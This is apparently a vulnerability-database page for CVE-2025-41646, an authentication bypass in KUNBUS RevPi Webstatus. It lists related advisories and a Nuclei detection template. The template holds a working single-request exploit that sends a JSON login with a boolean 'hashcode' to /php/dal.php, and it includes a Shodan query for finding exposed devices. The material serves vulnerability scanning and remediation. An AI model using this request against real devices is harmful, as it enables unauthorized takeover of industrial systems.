| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Exploit for Incorrect Type Conversion or Cast in Kunbus Revpi_Status | 4 Jul 202507:31 | – | githubexploit | |
| Exploit for Incorrect Type Conversion or Cast in Kunbus Revpi_Status | 19 Jul 202514:59 | – | githubexploit | |
| The vulnerability of the web application for the basic configuration of devices under Revolution Pi OS, specifically the Bullseye device, is related to deficiencies in the authentication process. This allows attackers to compromise the confidentiality, integrity, and accessibility of the protected information. | 10 Jun 202500:00 | – | bdu_fstec | |
| CVE-2025-41646 | 6 Jun 202515:43 | – | circl | |
| KUNBUS Revolution Pi 代码问题漏洞 | 6 Jun 202500:00 | – | cnnvd | |
| CVE-2025-41646 | 6 Jun 202514:42 | – | cve | |
| CVE-2025-41646 RevPi Webstatus application is vulnerable to an authentication bypass | 6 Jun 202514:42 | – | cvelist | |
| EUVD-2025-17316 | 6 Jun 202515:30 | – | euvd | |
| KUNBUS RevPi Webstatus | 10 Jul 202506:00 | – | ics | |
| CVE-2025-41646 | 6 Jun 202515:15 | – | nvd |
id: CVE-2025-41646
info:
name: RevPi Webstatus <= v2.4.5 - Authentication Bypass
author: DhiyaneshDK
severity: critical
description: |
An unauthorized remote attacker can bypass the authentication of the affected software package by misusing an incorrect type conversion. This leads to full compromise of the device
impact: |
Unauthenticated attackers can bypass authentication through incorrect type conversion in the login mechanism, achieving complete device compromise.
remediation: |
Upgrade RevPi Webstatus to version 2.4.6 or later that properly validates authentication credentials.
reference:
- https://psirt.kunbus.com/.well-known/csaf/white/2025/kunbus-2025-0000003.json
- https://x.com/win3zz/status/1940397684176904607
- https://nvd.nist.gov/vuln/detail/CVE-2025-41646
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-41646
cwe-id: CWE-704
epss-score: 0.40725
epss-percentile: 0.98481
cpe: cpe:2.3:a:kunbus:revpi_status:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: kunbus
product: revpi_status
shodan-query: title:"RevPi"
tags: cve,cve2025,kunbus,revpi-status,auth-bypass,revpi,vkev,vuln
http:
- raw:
- |
POST /php/dal.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"mode":"LOGIN","username":"admin","hashcode":true}
matchers-condition: and
matchers:
- type: word
words:
- '"status":"SUCCESS"'
- '"sessionId":'
condition: and
- type: status
status:
- 200
# digest: 490a00463044022048f298acabd4f95b79fc5397509c08add363df4e01f265815fad6e14fdd1152a02207eaf60b363e4fb201767263a5ea659491d6340e5d335978eec45a2aed73027c7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation